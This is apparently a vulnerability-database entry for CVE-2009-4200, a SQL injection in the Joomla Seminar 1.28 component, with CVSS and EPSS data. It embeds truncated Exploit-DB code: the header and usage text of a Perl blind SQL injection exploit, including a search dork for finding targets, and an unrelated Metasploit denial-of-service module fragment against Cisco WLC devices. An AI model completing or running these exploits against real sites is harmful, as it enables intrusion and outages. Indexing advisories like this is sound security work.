CVE-2009-4200
published 2009-12-04CVE-2009-4200: SQL injection vulnerability in the Seminar (com_seminar) component 1.28 for Joomla! allows remote attackers to execute arbitrary SQL commands via the id…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.91%
55.4th percentile
SQL injection vulnerability in the Seminar (com_seminar) component 1.28 for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a View_seminar action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vollmar | com_seminar | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Cisco WLC 4402 - Basic Auth Remote Denial of Service (Metasploit)
exploitdb·2009-07-27
Cisco WLC 4402 - Basic Auth Remote Denial of Service (Metasploit)
Cisco WLC 4402 - Basic Auth Remote Denial of Service (Metasploit)
---
require 'msf/core'
class Metasploit3 'Cisco WLC 4200 Basic Auth Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the Cisco WLC 4200
HTTP server. By sending a GET request with long authentication data, the
device becomes unresponsive and reboots. Firmware is reportedly vulnerable.
},
'Author' => [ 'Christoph Bott ' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 5949 $',
'References' =>
[
[ 'BID', '???'],
[ 'CVE', '???'],
[ 'URL', 'http://www.cisco.com/?????'],
],
'DisclosureDate' => 'January 26 2009'))
register_options(
[
Opt::RPORT(80),
], self.class)
end
def run
connect
print_status("Sending HTTP DoS packet")
sploit =
"GET /screens/frameset.html HTTP/1.0\r\n
Exploit-DB
Joomla! Component Seminar 1.28 - 'id' Blind SQL Injection
exploitdb·2009-06-03
CVE-2009-4200 Joomla! Component Seminar 1.28 - 'id' Blind SQL Injection
Joomla! Component Seminar 1.28 - 'id' Blind SQL Injection
---
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
print " o Joomla Component Seminar Blind SQL Injection Exploit o\n";
print " o Author:ThE g0bL!N o\n";
print " o More info:http://extensions.joomla.org/extensions/calendars-&-events/events-registration/8426/details o\n";
print " o vendor:http://seminar.vollmar.ws/ o\n";
print " o Dork : inurl:com_seminar o\n";
print " o Usage: perl bachir.pl host path o\n";
print " o Example: perl bachir.pl www.host.com /joomla/ -s 2 o\n";
print " o o\n";
print " o Options: o\n";
print " o -s valid Article id o\n";
print " o Note: o\n";
print " o You can Change the match string b
No writeups or analysis indexed.
2009-12-04
Published